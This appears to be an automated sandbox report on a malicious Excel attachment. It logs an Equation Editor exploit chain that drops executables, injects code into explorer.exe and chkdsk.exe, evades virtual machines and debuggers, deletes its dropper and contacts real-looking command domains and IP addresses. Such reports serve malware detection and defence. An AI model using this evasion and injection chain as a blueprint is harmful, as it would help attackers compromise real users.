          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02010078 NtResumeThread,10_2_02010078
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0201010C NtOpenDirectoryObject,10_2_0201010C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020101D4 NtSetValueKey,10_2_020101D4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02010C40 NtGetContextThread,10_2_02010C40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020110D0 NtOpenProcessToken,10_2_020110D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02011148 NtOpenThread,10_2_02011148
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FA20 NtQueryInformationFile,10_2_0200FA20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FA50 NtEnumerateValueKey,10_2_0200FA50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FBE8 NtQueryVirtualMemory,10_2_0200FBE8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200F8CC NtWaitForSingleObject,10_2_0200F8CC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02011930 NtSetContextThread,10_2_02011930
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200F938 NtWriteFile,10_2_0200F938
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FE24 NtWriteVirtualMemory,10_2_0200FE24
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FEA0 NtReadVirtualMemory,10_2_0200FEA0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FF34 NtQueueApcThread,10_2_0200FF34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FFFC NtCreateProcessEx,10_2_0200FFFC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FC30 NtOpenProcess,10_2_0200FC30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FC48 NtSetInformationFile,10_2_0200FC48
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FC90 NtUnmapViewOfSection,10_2_0200FC90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0200FD5C NtEnumerateKey,10_2_0200FD5C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02011D80 NtSuspendThread,10_2_02011D80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DA320 NtCreateFile,10_2_000DA320
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DA3D0 NtReadFile,10_2_000DA3D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DA450 NtClose,10_2_000DA450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DA500 NtAllocateVirtualMemory,10_2_000DA500
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DA3CA NtReadFile,10_2_000DA3CA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DA44B NtClose,10_2_000DA44B
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$RFQ-T56797W_1.xlsxJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@14/7@9/7
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: RFQ-T56797W_1.xlsxOLE indicator, Workbook stream: true
          Source: RFQ-T56797W_1.xlsxReversingLabs: Detection: 63%
          Source: RFQ-T56797W_1.xlsxVirustotal: Detection: 54%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeProcess created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeProcess created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8CB4.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00402053 CoCreateInstance,MultiByteToWideChar,5_2_00402053
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_00404292
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: RFQ-T56797W_1.xlsxStatic file information: File size 1228030 > 1048576
          Source: Binary string: chkdsk.pdb source: oktuxvhtsq.exe, 00000007.00000002.420661230.0000000000240000.00000040.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420667702.0000000000274000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849693334.00000000005E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: oktuxvhtsq.exe, oktuxvhtsq.exe, 00000007.00000003.411866541.0000000000430000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420725396.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000003.412146879.0000000000590000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000003.420901641.0000000001D10000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000003.421285502.0000000001E70000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849798315.0000000002180000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: D:\xampp\htdocs\d97f8e9e1ea74988993ee47b9f946ba8\Loader\Release\Loader.pdb source: word.exe, 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415689010.0000000002390000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000006.00000000.410185124.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000007.00000000.411311230.000000000042E000.00000002.00000001.01000000.00000006.sdmp, explorer.exe, 00000008.00000002.851097210.000000000870F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849622577.00000000003A3000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000024FF000.00000004.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe.5.dr
          Source: Binary string: D:\xampp\htdocs\d97f8e9e1ea74988993ee47b9f946ba8\Loader\Release\Loader.pdb& source: word.exe, 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415689010.0000000002390000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000006.00000000.410185124.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000007.00000000.411311230.000000000042E000.00000002.00000001.01000000.00000006.sdmp, explorer.exe, 00000008.00000002.851097210.000000000870F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849622577.00000000003A3000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000024FF000.00000004.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe.5.dr
          Source: RFQ-T56797W_1.xlsxInitial sample: OLE indicators vbamacros = False

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeUnpacked PE file: 7.2.oktuxvhtsq.exe.400000.2.unpack .text:ER;.rdata:R;.data:W;.gfids:R;.tls:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_004102F6 push ecx; ret 6_2_00410309
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0040FD0A push ecx; ret 6_2_0040FD1D
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041E211 push cs; iretd 7_2_0041E213
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041D475 push eax; ret 7_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041D4C2 push eax; ret 7_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041D4CB push eax; ret 7_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041D52C push eax; ret 7_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00418689 pushad ; iretd 7_2_0041868A
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0073DFA1 push ecx; ret 7_2_0073DFB4
          Source: C:\Windows\explorer.exeCode function: 8_2_07D89B1E push esp; retn 0000h8_2_07D89B1F
          Source: C:\Windows\explorer.exeCode function: 8_2_07D89B02 push esp; retn 0000h8_2_07D89B03
          Source: C:\Windows\explorer.exeCode function: 8_2_07D899B5 push esp; retn 0000h8_2_07D89AE7
          Source: C:\Windows\explorer.exeCode function: 8_2_08082B02 push esp; retn 0000h8_2_08082B03
          Source: C:\Windows\explorer.exeCode function: 8_2_08082B1E push esp; retn 0000h8_2_08082B1F
          Source: C:\Windows\explorer.exeCode function: 8_2_080829B5 push esp; retn 0000h8_2_08082AE7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0201DFA1 push ecx; ret 10_2_0201DFB4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DE211 push cs; iretd 10_2_000DE213
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DD475 push eax; ret 10_2_000DD4C8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DD4CB push eax; ret 10_2_000DD532
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DD4C2 push eax; ret 10_2_000DD4C8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000DD52C push eax; ret 10_2_000DD532
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_000D8689 pushad ; iretd 10_2_000D868A
          Source: C:\Users\user\AppData\Roaming\word.exeFile created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jakatrol2.1[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0040F085 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_0040F085
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000000C9904 second address: 00000000000C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000000C9B6E second address: 00000000000C9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-178
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_6-22967
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_8-13950
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1712Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1344Thread sleep count: 70 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2696Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -480000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1488Thread sleep count: 441 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1488Thread sleep time: -882000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1488Thread sleep count: 9529 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1488Thread sleep time: -19058000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 1511Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeWindow / User API: threadDelayed 441Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeWindow / User API: threadDelayed 9529Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00409AA0 rdtsc 7_2_00409AA0
          Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end nodegraph_5-3463
          Source: explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
          Source: explorer.exe, 00000008.00000000.413347575.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000002.850269711.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.413347575.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
          Source: explorer.exe, 00000008.00000002.849943461.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
          Source: explorer.exe, 00000008.00000000.413347575.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_002407DA GetSystemInfo,6_2_002407DA
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00405E93 FindFirstFileA,FindClose,5_2_00405E93
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_004054BD
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00402671 FindFirstFileA,5_2_00402671
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_004016D0 FindFirstFileW,FindNextFileW,FindClose,6_2_004016D0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0042478A FindFirstFileExW,6_2_0042478A
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036BBABB mov edx, dword ptr fs:[00000030h]2_2_036BBABB
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0024005F mov eax, dword ptr fs:[00000030h]6_2_0024005F
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0024013E mov eax, dword ptr fs:[00000030h]6_2_0024013E
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_00240109 mov eax, dword ptr fs:[00000030h]6_2_00240109
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0024017B mov eax, dword ptr fs:[00000030h]6_2_0024017B
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007200EA mov eax, dword ptr fs:[00000030h]7_2_007200EA
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00720080 mov ecx, dword ptr fs:[00000030h]7_2_00720080
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007426F8 mov eax, dword ptr fs:[00000030h]7_2_007426F8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02000080 mov ecx, dword ptr fs:[00000030h]10_2_02000080
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020000EA mov eax, dword ptr fs:[00000030h]10_2_020000EA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020226F8 mov eax, dword ptr fs:[00000030h]10_2_020226F8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_004100BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004100BC
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0042194B GetProcessHeap,6_2_0042194B
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00409AA0 rdtsc 7_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0040ACE0 LdrLoadDll,7_2_0040ACE0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0041024E SetUnhandledExceptionFilter,6_2_0041024E
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_004100BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004100BC
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0041046C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0041046C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_00414847 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00414847

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.212 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 206.188.193.211 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.credit-cards-16215.bond
          Source: C:\Windows\explorer.exeDomain query: www.luxpsy.com
          Source: C:\Windows\explorer.exeDomain query: www.centralngs.com
          Source: C:\Windows\explorer.exeDomain query: www.west-paws.com
          Source: C:\Windows\explorer.exeDomain query: www.miamirealestatecommercial.com
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.19 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sxchenggu.com
          Source: C:\Windows\explorer.exeNetwork Connect: 38.11.36.68 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.narrativepages.com
          Source: C:\Windows\explorer.exeDomain query: www.pj69vip12.cyou
          Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
